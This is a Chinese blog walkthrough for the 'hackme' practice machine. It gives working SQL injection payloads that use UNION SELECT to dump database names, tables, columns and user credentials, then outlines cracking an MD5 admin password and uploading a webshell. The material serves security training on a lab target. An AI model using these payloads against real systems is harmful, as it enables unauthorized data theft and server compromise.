hackme靶机通关攻略

最新推荐文章于 2024-09-03 20:00:15 发布
最新推荐文章于 2024-09-03 20:00:15 发布
阅读量318 收藏 1
点赞数 8
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80402555/article/details/141867607
版权

1、登录靶机,查询是否有注入点

2、判断闭合方式

输入OSINT' and 1=1 #

输入OSINT' and 1=2 #

得出闭合方式为单引号

2、查询数据库名

输入-1' union select database(),2,3 #

3、查询数据库中的表

输入-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' #

4、查询users表中的列

输入-1' union select group_concat(column_name),2,3 from information_schema.columns where table_schema='webapphacking' and table_name='users'#

5、查询users表中所有信息

输入-1' union select group_concat(user),group_concat(pasword),3 from users #

得到一个superadmin的账号密码,

6、使用MD5将密码解密

7、使用解密后的密码进行登录

8、尝试上传一句话木马文件

9、上传成功后使用蚁剑进行链接

L黎蕊
关注
  • 8
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Hackme靶机渗透
m0_50584370的博客
06-01 248
hackme靶机渗透
DVWA靶机通关攻略第三——CSRF攻击
小飞飞的博客
03-09 1028
DVWA靶机通关攻略请求伪造详细教学
靶机通关| hackme.ova通关攻略
a96482的博客
07-29 376
GitHub - foryujian/yjdirscan: 御剑目录扫描专业版,简单实用的命令行网站目录扫描工具,支持爬虫、fuzz、自定义字典、字典变量、UA修改、假404自动过滤、扫描控速等功能。发现共有5个网址,通过一一访问,我们并没有发现注入点,但该站点有注册、登录功能,我们可以去注册、登录进去看是否有注入点。该网站有登录,注册界面,我们可以尝试二次注入,但是由于没有修改账户的页面,也宣告失败。我们注册后会发现,会在页面上显示用户名,可以尝试XSS注入,但是失败了。最后经判断为sql注入类型。
Hackme靶机通关攻略
最新发布
qq_65852138的博客
09-03 185
Hackme靶机通关攻略
.hackme靶机通关攻略
2301_81525518的博客
09-03 189
上传一句话木马 <?> 写入1.php上传后去看它的目录里边有没有。有就说明写进去了然后去连接webshell。可以看到密码是加密后的拿到密码进行解密。(这里我用的superadmin用户)回去登录进去看见有个上传文件的地方。只有一个框框那就来试试sql注入。这里查看users表的用户和密码。通过御剑扫描到IP进入尝试。进来点一下提交出来书名。
靶机通关 | hackme.ova靶机通关秘籍~
鱼溯的博客
10-19 230
靶场通关 | hackme.ova靶机通关秘籍~
DVWA靶机通关攻略第四——文件包含
小飞飞的博客
03-11 794
DVWA靶机的文件包含详细教学
DVWA靶机通关攻略第五——文件上传
小飞飞的博客
03-11 957
DVWA靶机文件上传详细教学
HACKME:1靶机
JKding123的博客
10-22 979
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
SQL经典五十道选刷
m0_67496588的博客
08-31 991
SQL经典五十道选刷
九、安装artifactory并配置PostgreSQL--失败了
shafatudou的博客
09-01 1376
基于八,克隆出一个新的虚拟机,用来安装制品库并配置mysql数据库。仅参考,未使用(配置的centos自带的数据库,不会用)
MySQL数据库增删查改(基础)CRUD
chendemingxxx的博客
09-02 1083
比如说:创建一张学生表,有姓名,学号。插入两个学生。可能有点草率看看例子: 顺序不是问题,后面参数和前面括号参数对等就行。比如说上面的例子:把id和name参数倒过来了,后面参数一一对应也可以。不推荐使用全列查询原因:比如说上面例子我只要id或者说只要name;当然也可以查询多个列: 比如说我们创建一个这样的表命令:第一个 效果:第三个总分效果:拓展一个现象: 拓展:语法:比较运算符:逻辑运算符:解释:%在mysql这里代表的是多个任意字符,_代表的是 一个任意字符。揭晓来才是修改硬盘里面的内容。案例:
Python知识点:如何使用SQLAlchemy进行ORM(对象系映射)
码农超哥的博客
08-31 798
定义数据库表的ORM模型。每个模型类都需要继承自Base,并且通常以类的属性形式定义表的列。
【解决】sql中包含问号(?),导致mybatis解析错误
奔跑的菜鸟的Run博客
08-30 422
被替换了 而不是 我们参数 ,参数的位置还是空的。下面给出两种我测试都可以的方案,但是个人比较推荐第二种方案。这个sql在我们的sql连接器中执行是完全没问题的,但是在mybatis中使用这个sql的时候。也就是在问号的前面多加一个问号,这样就能解决了。会被mybatis当作占位符 替换成参数。给解析成变量 导致sql查询失败。解析参数会把 sql语句中的。sql语句中本身包含。使用pg数据库内置函数。
PostgreSQL技术内幕6:PostgreSQL索引技术
qq_40529346的博客
09-01 2226
本文主要介绍PG的索引技术,包含PG支持的索引类型,语法,查看方式,以及其中B-Tree索引的原理解析和源码解读。
postgresql简单数据备份
weixin_43322583的博客
09-03 398
PostgreSQL是一个功能非常强大的、源代码开放的客户/服务器系型数据库管理系统(RDBMS)python链接postgresql使用的包是psycopg2,免密操作后不需要 用户密码。
LeetCode_sql_day20(1398.购买了产品A和产品B却没有购买产品C的顾客)
Darling博客
09-01 714
理解sum(product_name='A')是难点 表示在同组中满足该条件就为1 不满足则为0。
MP条件构造器之常用功能详解(select、set)
2301_80093566的博客
08-31 918
方法是 MyBatis-Plus 中用于构建更新操作的高级方法之一,它用于设置更新语句中的 SET 字段。方法是 MyBatis-Plus 中用于构建查询条件的高级方法之一,它用于设置查询的字段。现在,我们希望根据动态条件来决定是否更新某些字段。方法,可以指定在查询结果中包含哪些字段,从而实现字段级别的查询定制。如果字段名称在数据库和对象模型中不同,我们可以使用映射名称进行更新。现在,我们希望根据特定的条件来选择字段,并且排除主键字段。假设我们希望查询字段,但排除主键字段。,生成的 SQL 语句如下:**
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值